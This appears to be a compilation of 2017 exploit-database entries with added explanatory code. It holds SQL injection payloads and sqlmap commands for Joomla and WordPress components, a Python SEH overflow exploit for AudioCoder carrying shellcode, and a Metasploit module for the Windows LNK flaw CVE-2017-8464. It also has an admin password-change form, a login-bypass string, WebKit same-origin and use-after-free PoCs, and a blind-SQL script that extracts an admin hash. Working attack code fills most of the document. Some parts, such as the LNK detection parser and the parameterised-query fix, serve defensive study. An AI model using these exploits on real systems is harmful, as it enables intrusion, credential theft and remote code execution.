Expires: Thu, 23 Mar 2017 15:36:33 GMT
Vary: Cookie,Accept-Encoding
Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT
X-UA-Compatible: IE=Edge
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
Set-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 70940
(...)
<form id="replacemsg_form">
<div style='display:none'><input type='hidden' name='csrfmiddlewaretoken' value='d58f666c794024295cece8c5b8b6a3ff' /></div> <textarea id="buffer" name="buffer">ABC</textarea>
<script>alert('XSS')</script>
</textarea>
(...)
"Joomla Component ccnewsletter 2.1.9 - 'sbid' Parameter SQL Injection"
# Exploit Title: Joomla Component ccnewsletter 2.1.9 - SQL Injection
# Date: 07-26-2017
# Exploit Author: Shahab Shamsi
# Vendor Homepage: https://extensions.joomla.org/extension/ccnewsletter/
# Version: = 2.1.9 [Final Version]
# Tested on: Win,Linux
# Google Dork: inurl:"index.php?option=com_ccnewsletter" inurl:sbid
# Video Reference: http://securityman.org/joomla-component-ccnewsletter-2-1-9-sql-injection/
Sqlmap:
sqlmap -u "http://Target/index.php?option=com_ccnewsletter&view=detail&id=73&sbid=[SQL]&tmpl=newsletter" -p sbid --dbs
Testing Method:
- boolean-based blind
- time-based blind
- UNION query
Parameter: sbid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND 3881=3881&tmpl=newsletter
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND SLEEP(5)&tmpl=newsletter
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
Source: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69687
The attached program binary causes a buffer overflow in cplus-dem.c when it tries to demangle specially crafted function arguments in the binary. Both the buffer size as well as the buffer content are controlled from the binary.
objdump -x -C <file>
nm -C <file>
Tested on the following configurations
* 2.6.32-573.7.1.el6.x86_64 #1 SMP Tue Sep 22 22:00:00 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
* 4.1.12-boot2docker #1 SMP Tue Nov 3 06:03:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
* Binutils versions: 2.20 and 2.26
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42386.zip
#!/usr/bin/python
# Exploit Title : AudioCoder 0.8.46 Local Buffer Overflow (SEH)
# CVE : CVE-2017-8870
# Exploit Author : Muhann4d @0xSecured
# Vendor Homepage : http://www.mediacoderhq.com
# Vulnerable Software: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=AudioCoder-0.8.46.exe
# Vulnerable Version : 0.8.46
# Fixed version : N/A
# Category : Local Buffer Overflow
# Tested on OS : Windows 7 Pro SP1 32bit
# How to : Open AudioCoder then drag & drop the .m3u file in it and then press the START button.
# Timeline :
# 2017-05-05: Vulnerability discovered, vendor has been contacted
# 2017-05-08: Vendor replied denying it: "I believe this was an old issue and no longer exists in the latest version"
# 2017-05-09: A POC sent to the vendor. No reply since then.
# 2017-06-26: Exploit released.
from struct import pack

print("AudioCoder 0.8.46 Local Buffer Overflow By Muhann4d @0xSecured")

# 741 filler bytes after the "http://" scheme put the next 8 bytes on the SEH record
junk = b"http://" + b"\x41" * 741
# nSEH: EB 06 = JMP SHORT +6 over the handler address, followed by two NOPs
nseh = pack('<I', 0x909006eb)
# SEH handler address used by the original exploit
seh = pack('<I', 0x66015926)
nops = b"\x90" * 20
# calc.exe shellcode
shell = (b"\xb8\x9d\x01\x15\xd1\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
         b"\x32\x31\x42\x12\x03\x42\x12\x83\x77\xfd\xf7\x24\x7b\x16\x7e"
         b"\xc6\x83\xe7\xe1\x4e\x66\xd6\x33\x34\xe3\x4b\x84\x3e\xa1\x67"
         b"\x6f\x12\x51\xf3\x1d\xbb\x56\xb4\xa8\x9d\x59\x45\x1d\x22\x35"
         b"\x85\x3f\xde\x47\xda\x9f\xdf\x88\x2f\xe1\x18\xf4\xc0\xb3\xf1"
         b"\x73\x72\x24\x75\xc1\x4f\x45\x59\x4e\xef\x3d\xdc\x90\x84\xf7"
         b"\xdf\xc0\x35\x83\xa8\xf8\x3e\xcb\x08\xf9\x93\x0f\x74\xb0\x98"
         b"\xe4\x0e\x43\x49\x35\xee\x72\xb5\x9a\xd1\xbb\x38\xe2\x16\x7b"
         b"\xa3\x91\x6c\x78\x5e\xa2\xb6\x03\x84\x27\x2b\xa3\x4f\x9f\x8f"
         b"\x52\x83\x46\x5b\x58\x68\x0c\x03\x7c\x6f\xc1\x3f\x78\xe4\xe4"
         b"\xef\x09\xbe\xc2\x2b\x52\x64\x6a\x6d\x3e\xcb\x93\x6d\xe6\xb4"
         b"\x31\xe5\x04\xa0\x40\xa4\x42\x37\xc0\xd2\x2b\x37\xda\xdc\x1b"
         b"\x50\xeb\x57\xf4\x27\xf4\xbd\xb1\xd8\xbe\x9c\x93\x70\x67\x75"
         b"\xa6\x1c\x98\xa3\xe4\x18\x1b\x46\x94\xde\x03\x23\x91\x9b\x83"
         b"\xdf\xeb\xb4\x61\xe0\x58\xb4\xa3\x83\x3f\x26\x2f\x44")
# pad the playlist entry out to the 2572-byte crash length
junkD = b"D" * (2572 - len(junk + nseh + seh + nops + shell))
exploit = junk + nseh + seh + nops + shell + junkD
try:
    with open("Exploit.m3u", 'wb') as f:
        f.write(exploit)
    input("\nExploit has been created!\n")
except OSError:
    print("There has been an Error")
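The exploit above hard-codes a 741-byte filler and the nSEH value 0x909006eb without showing where they come from. The following is an added example, not part of the original exploit, that reproduces the usual way of finding them: a Metasploit-style cyclic pattern, the lookup of a crash value back to its offset, and the nSEH short-jump encoding. The "debugger reading" is constructed here from the layout the exploit itself uses (the "http://" prefix, 741 filler bytes, then nSEH and SEH); nothing touches AudioCoder.

```python
import string
import struct


def pattern_create(length):
    """Aa0Aa1Aa2...: 26*26*10 unique triplets, so every 4-byte window is unique
    in the first 20280 bytes and maps back to exactly one offset."""
    chunks = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                chunks.append(u + l + d)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(crash_value, length=20280):
    """Map a value seen in the SEH record (int as the debugger shows it,
    4 raw bytes, or the 4-char string) back to its offset in the pattern."""
    if isinstance(crash_value, int):
        needle = struct.pack("<I", crash_value).decode("latin-1")
    elif isinstance(crash_value, (bytes, bytearray)):
        needle = bytes(crash_value).decode("latin-1")
    else:
        needle = crash_value
    return pattern_create(length).find(needle)


def seh_layout(seh_handler_value):
    """Given the handler value observed after feeding prefix + pattern, return
    (junk_len, nseh_offset, seh_offset) relative to the start of the pattern.
    junk_len is what the exploit fills with 'A' before the nSEH record."""
    seh_off = pattern_offset(seh_handler_value)
    if seh_off < 0:
        raise ValueError("value not found in pattern")
    return seh_off - 4, seh_off - 4, seh_off


def nseh_short_jump(skip=6):
    """nSEH payload: JMP SHORT +skip (EB xx) plus two NOPs; skip=6 steps over the
    4-byte handler address and the NOPs, i.e. 0x909006eb as a little-endian dword."""
    return bytes([0xEB, skip, 0x90, 0x90])


def simulate_crash(prefix=b"http://", total=2572, junk_len=741):
    """Constructed stand-in for the debugger: build prefix + pattern the way the
    exploit builds prefix + junk, and read back the dword that lands in the SEH
    handler slot (prefix, junk, then the 4-byte nSEH, then the handler)."""
    data = prefix + pattern_create(total - len(prefix)).encode("latin-1")
    seh_pos = len(prefix) + junk_len + 4
    return struct.unpack_from("<I", data, seh_pos)[0]


if __name__ == "__main__":
    observed = simulate_crash()
    print("SEH handler overwritten with 0x%08x" % observed)
    print("junk/nSEH/SEH offsets:", seh_layout(observed))
    print("nSEH bytes:", nseh_short_jump().hex())
```

Offsets come back relative to the pattern, so when a fixed prefix such as the URL scheme precedes it, the prefix is not counted in junk_len; that is why the exploit's 741 excludes the seven bytes of "http://".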
Friends in War Make or Break 1.7 - Unauthenticated admin password change
Url: http://software.friendsinwar.com/
http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
PROOF OF CONCEPT:
<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
<label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
<input type="text" name="password" value="ChangeMe">
<input type="text" name="submit" value="Edit+Password" hidden=true>
<input type="submit" value="Submit">
</form>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
attr_accessor :exploit_dll_name
def initialize(info = {})
super(update_info(info,
'Name' => 'LNK Remote Code Execution Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
that contain a dynamic icon, loaded from a malicious DLL.
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
similar except that an additional SpecialFolderDataBlock is included. The folder ID
in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
DLL file.
},
'Author' =>
[
'Uncredited', # vulnerability discovery
'Yorick Koster' # msf module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2017-8464'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
['URL', 'http://paper.seebug.org/357/'], # writeup
['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Arch' => [ARCH_X86, ARCH_X64],
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows x64', { 'Arch' => ARCH_X64 } ],
[ 'Windows x86', { 'Arch' => ARCH_X86 } ]
],
'DefaultTarget' => 0, # Default target is 64-bit
'DisclosureDate' => 'Jun 13 2017'))
register_advanced_options(
[
OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
])
end
def exploit
dll = generate_payload_dll
dll_name = "#{rand_text_alpha(16)}.dll"
dll_path = store_file(dll, dll_name)
print_status("#{dll_path} created, copy it to the root folder of the target USB drive")
# HACK the vulnerability doesn't appear to work with UNC paths
# Create LNK files to different drives instead
'DEFGHIJKLMNOPQRSTUVWXYZ'.split("").each do |i|
lnk = generate_link("#{i}:\\#{dll_name}")
lnk_path = store_file(lnk, "#{rand_text_alpha(16)}_#{i}.lnk")
print_status("#{lnk_path} created, copy it to the USB drive if the drive letter is #{i}")
end
end
def generate_link(path)
path << "\x00"
display_name = "Flash Player\x00" # LNK Display Name
comment = "\x00"
# Control Panel Applet ItemID with our DLL
cpl_applet = [
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
].pack('C*')
cpl_applet << [path.length].pack('v')
cpl_applet << [display_name.length].pack('v')
cpl_applet << path.unpack('C*').pack('v*')
cpl_applet << display_name.unpack('C*').pack('v*')
cpl_applet << comment.unpack('C*').pack('v*')
# LinkHeader
ret = [
0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C
0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046
0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)
0x00, 0x00, 0x00, 0x00, # FileAttributes
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime
0x00, 0x00, 0x00, 0x00, # FileSize
0x00, 0x00, 0x00, 0x00, # IconIndex
0x00, 0x00, 0x00, 0x00, # ShowCommand
0x00, 0x00, # HotKey
0x00, 0x00, # Reserved1
0x00, 0x00, 0x00, 0x00, # Reserved2
0x00, 0x00, 0x00, 0x00 # Reserved3
].pack('C*')
# IDList
idlist_data = ''
idlist_data << [0x12 + 2].pack('v') # ItemIDSize
idlist_data << [
# This PC
0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,
0x30, 0x9d
].pack('C*')
idlist_data << [0x12 + 2].pack('v') # ItemIDSize
idlist_data << [
# All Control Panel Items
0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
0x30, 0x9d
].pack('C*')
idlist_data << [cpl_applet.length + 2].pack('v')
idlist_data << cpl_applet
idlist_data << [0x00].pack('v') # TerminalID
# LinkTargetIDList
ret << [idlist_data.length].pack('v') # IDListSize
ret << idlist_data
# ExtraData
# SpecialFolderDataBlock
ret << [
0x10, 0x00, 0x00, 0x00, # BlockSize
0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList
].pack('C*')
# TerminalBlock
ret << [0x00, 0x00, 0x00, 0x00].pack('V')
ret
end
# Store the file in the MSF local directory (eg, /root/.msf4/local/)
def store_file(data, filename)
ltype = "exploit.fileformat.#{self.shortname}"
if ! ::File.directory?(Msf::Config.local_directory)
FileUtils.mkdir_p(Msf::Config.local_directory)
end
if filename and not filename.empty?
if filename =~ /(.*)\.(.*)/
ext = $2
fname = $1
else
fname = filename
end
else
fname = "local_#{Time.now.utc.to_i}"
end
fname = ::File.split(fname).last
fname.gsub!(/[^a-z0-9\.\_\-]+/i, '')
fname << ".#{ext}"
path = File.join("#{Msf::Config.local_directory}/", fname)
full_path = ::File.expand_path(path)
File.open(full_path, "wb") { |fd| fd.write(data) }
full_path.dup
end
end
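The module's generate_link builds the LNK byte by byte but never reads one back. The following is an added example, not part of the Metasploit module, that mirrors the same layout in Python (header, the three-item IDList, the SpecialFolderDataBlock pointing at CSIDL_CONTROLS) and then parses an arbitrary LNK to flag that combination, which is the shape a detection rule for this bypass needs to recognise. The byte constants are copied from generate_link; the parser handles only the LinkTargetIDList and ExtraData sections, which is all this layout contains, and the ".dll" check on the applet path is a heuristic of ours.

```python
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes([0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
                    0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46])
HAS_LINK_TARGET_ID_LIST = 0x01
IS_UNICODE = 0x80
SPECIAL_FOLDER_DATA_BLOCK = 0xA0000005
CSIDL_CONTROLS = 0x03
# ItemIDs copied from the module: "This PC" and "All Control Panel Items"
THIS_PC = bytes([0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10,
                 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d])
CONTROL_PANEL = bytes([0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10,
                       0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d])


def build_lnk(dll_path, display_name="Flash Player", special_folder_block=True):
    """Same layout as generate_link: header, three-item IDList, SpecialFolderDataBlock."""
    path = dll_path + "\x00"
    name = display_name + "\x00"
    # CPL applet ItemID: 18-byte prefix with 0x6a at offset 11, two UTF-16 lengths, strings
    applet = bytes(11) + b"\x6a" + bytes(6)
    applet += struct.pack("<HH", len(path), len(name))
    applet += path.encode("utf-16-le") + name.encode("utf-16-le") + "\x00".encode("utf-16-le")
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID
    header += struct.pack("<I", HAS_LINK_TARGET_ID_LIST | IS_UNICODE)
    header += bytes(HEADER_SIZE - len(header))  # attributes, times, sizes, reserved: all zero
    idlist = b""
    for item in (THIS_PC, CONTROL_PANEL, applet):
        idlist += struct.pack("<H", len(item) + 2) + item  # ItemIDSize includes itself
    idlist += b"\x00\x00"  # TerminalID
    extra = b""
    if special_folder_block:
        applet_offset = 2 * (2 + len(THIS_PC))  # 0x28: third item in the IDList
        extra += struct.pack("<IIII", 0x10, SPECIAL_FOLDER_DATA_BLOCK, CSIDL_CONTROLS, applet_offset)
    extra += b"\x00\x00\x00\x00"  # TerminalBlock
    return header + struct.pack("<H", len(idlist)) + idlist + extra


def parse_lnk(data):
    """Return (flags, idlist_items, extra_blocks). Raises on files that carry
    LinkInfo or StringData, which this minimal parser does not walk."""
    if (len(data) < HEADER_SIZE or data[:4] != struct.pack("<I", HEADER_SIZE)
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    if flags & 0x7E:  # HasLinkInfo, HasName, HasRelativePath, HasWorkingDir, HasArguments, HasIconLocation
        raise NotImplementedError("LinkInfo or StringData present")
    off = HEADER_SIZE
    items = []
    if flags & HAS_LINK_TARGET_ID_LIST:
        size = struct.unpack_from("<H", data, off)[0]
        end = off + 2 + size
        off += 2
        while off + 2 <= end:
            item_size = struct.unpack_from("<H", data, off)[0]
            if item_size == 0:  # TerminalID
                break
            items.append(data[off + 2:off + item_size])
            off += item_size
        off = end
    blocks = []
    while off + 8 <= len(data):
        size, sig = struct.unpack_from("<II", data, off)
        if size < 4:  # TerminalBlock
            break
        blocks.append((sig, data[off + 8:off + size]))
        off += size
    return flags, items, blocks


def cpl_applet_dll(data):
    """Return the DLL path when the LNK points its SpecialFolderDataBlock at the
    Control Panel and carries a CPL applet item naming a .dll, else None."""
    _, items, blocks = parse_lnk(data)
    targets_control_panel = any(
        sig == SPECIAL_FOLDER_DATA_BLOCK and len(body) >= 4
        and struct.unpack_from("<I", body, 0)[0] == CSIDL_CONTROLS
        for sig, body in blocks)
    if not targets_control_panel:
        return None
    for item in items:
        if len(item) < 22 or item[11] != 0x6a:
            continue
        path_len = struct.unpack_from("<H", item, 18)[0]
        path = item[22:22 + 2 * path_len].decode("utf-16-le", "replace").rstrip("\x00")
        if path.lower().endswith(".dll"):
            return path
    return None
```

A real LNK from disk may carry LinkInfo or StringData before the ExtraData section; parse_lnk refuses those rather than mis-parse them, so a production rule should skip those sections per MS-SHLLINK before the ExtraData walk.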
# # # # #
# Exploit Title: Friends in War Make or Break 1.7 SQL Injection
# Dork: N/A
# Date: 26.07.2017
# Vendor : http://software.friendsinwar.com/
# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Demo: http://localhost/[PATH]/
# Version: 1.7
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/useruploads.php?username=[SQL]
# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# http://localhost/[PATH]/index.php?catid=[SQL]
# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# Etc..
# # # # #
# Exploit Title: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager <= v3.4 - Stored XSS / SQLi
# Date: 2017-07-25
# Exploit Author: 8bitsec
# Vendor Homepage: http://adspro.scripteo.info/
# Software Link: https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010
# Version: 3.4
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-07-25
Product & Service Introduction:
===============================
Ads Pro is a Premium WordPress Ad Plugin that helps you manage, sell and display your advertising space, in a way that no other plugin can.
Technical Details & Description:
================================
Multiple Stored XSS vulnerabilities found.
Blind SQL Injection on bsa_pro_id parameter.
Proof of Concept (PoC):
=======================
Stored XSS:
On the Front End Order Form the Ad Title and Ad Description parameters are vulnerable. The payload will execute when the ad is displayed.
Blind SQL Injection:
Parameter: bsa_pro_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND 1707=1707
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND SLEEP(5)
Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
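Both the ccnewsletter sbid advisory above and this bsa_pro_id one only list the sqlmap payload shapes (AND 3881=3881, AND 1707=1707, AND SLEEP(5)). The following is an added example, not from either advisory, of the boolean-based blind extraction those payloads enable, run against a constructed SQLite stand-in for a page that concatenates an integer parameter into its WHERE clause. Table and column names and the stored values are assumptions; the MySQL time-based variant swaps the page-content oracle for a response-time measurement but otherwise uses the same loop.

```python
import sqlite3


def make_db():
    """Constructed data: a subscriber row the page normally shows and a user row to steal."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE subscribers(id INTEGER PRIMARY KEY, email TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO subscribers VALUES (185, 'reader@example.org');
        INSERT INTO users VALUES (1, 'admin', 'd41d8cd98f00b204e9800998ecf8427e');
    """)
    return conn


def vulnerable_view(conn, sbid):
    """Stand-in for the detail view: the parameter is concatenated into SQL.
    True when the page would render a row, False on no row or an SQL error."""
    sql = "SELECT email FROM subscribers WHERE id=" + sbid
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def oracle(conn, condition):
    """The sqlmap payload shape: sbid=185 AND <condition>. Page content is the oracle."""
    return vulnerable_view(conn, "185 AND (" + condition + ")")


def extract(conn, subquery, max_len=64):
    """Recover the text result of subquery one character at a time, binary
    searching its code point: 7 requests per character for 7-bit data."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode(substr(...)) is SQLite's ORD(MID(...)); past the end it is NULL,
            # the comparison is never true and lo stays at 0, which ends the loop
            if oracle(conn, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("true  payload:", oracle(db, "3881=3881"))
    print("false payload:", oracle(db, "3881=3882"))
    print("admin hash   :", extract(db, "SELECT password FROM users WHERE username='admin'"))
```

A 32-character hash costs 7 requests per character, 224 in all, which is the request volume to expect in the web server log when this technique is run against a live target.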
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: Make or Break
[x] Script Version: 1.7
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
[x] Author: Anarchy Angel
[x] Mail: anarchy[dot]ang31@gmail[dot]com
[x] More info: https://aahideaway.blogspot.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Navigate to the script's admin login page and submit admin' or ''='-- as the username,
and it should give you access to the admin area. A quick release to
kick off DefCon festivities. See you there! Enjoy >:)
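Why the username alone is enough: the payload closes the quoted username and adds an OR, so the WHERE clause becomes username='admin' OR (''='--' AND password='...'), which is true for the admin row whatever the password because AND binds tighter than OR. The following is an added example, not from the advisory, that reproduces that query against a constructed SQLite table beside the parameterised form that defeats it. The table and column names and the stored password are assumptions; a real application would compare a password hash, which changes nothing about the injection.

```python
import sqlite3

PAYLOAD = "admin' or ''='--"


def make_db():
    """Constructed admin table; the password is stored in clear only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE mob_admin(username TEXT, password TEXT);
        INSERT INTO mob_admin VALUES ('admin', 'correct horse battery staple');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """String-built query. With PAYLOAD as username the clause is
    username='admin' OR (''='--' AND password='...') and the admin row matches."""
    sql = ("SELECT username FROM mob_admin WHERE username='" + username +
           "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Parameterised query: the quote and the OR in the payload stay data."""
    row = conn.execute(
        "SELECT username FROM mob_admin WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))
    print("fixed     :", login_fixed(db, PAYLOAD, "anything"))
```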
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1240
JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype, so JSDOMWindow::getPrototype, which checks the Same Origin Policy, is not called.
The PoCs show how to call a setter defined on an object from another origin.
PoC 1 - JSValue::putToPrimitive:
-->
<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let loc = f.contentWindow.location;
f.onload = () => {
let a = 1.2;
a.__proto__.__proto__ = f.contentWindow;
a['test'] = {toString: function () {
arguments.callee.caller.constructor('alert(location)')();
}};
};
f.src = 'data:text/html,' + `<iframe></iframe><script>
Object.prototype.__defineSetter__('test', v => {
'a' + v;
});
</scrip` + `t>`;
</script>
</body>
<!--
PoC 2 - JSObject::putInlineSlow:
<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let loc = f.contentWindow.location;
f.onload = () => {
let a = {
__proto__: f.contentWindow
};
a['test'] = {toString: function () {
arguments.callee.caller.constructor('alert(location)')();
}};
};
f.src = 'data:text/html,' + `<iframe></iframe><script>
Object.prototype.__defineSetter__('test', v => {
'a' + v;
});
</scrip` + `t>`;
</script>
</body>
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1241
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on an ASan build of WebKit nightly.
PoC:
=================================================================
-->
<script>
function freememory() {
var a;
for(var i=0;i<100;i++) {
a = new Uint8Array(1024*1024);
}
}
function go() {
meter.textContent = "foo";
freememory();
}
function eventhandler() {
template.appendChild(table);
}
</script>
<body onload=go()>
<meter id="meter">
<shadow>
<template id="template">
</template>
<style onload="eventhandler()"></style>
<table id="table">
<iframe></iframe>
<svg>
<!--
=================================================================
ASan log:
=================================================================
==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp 0x7fff5369a300 sp 0x7fff5369a2f8
READ of size 8 at 0x60c0000b7070 thread T0
==29516==WARNING: invalid path to external symbolizer!
==29516==WARNING: Failed to use and restart external symbolizer!
#0 0x1111c843a in WebCore::Node::nextSibling() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a)
#1 0x1115649f3 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3af9f3)
#2 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)
#3 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)
#4 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)
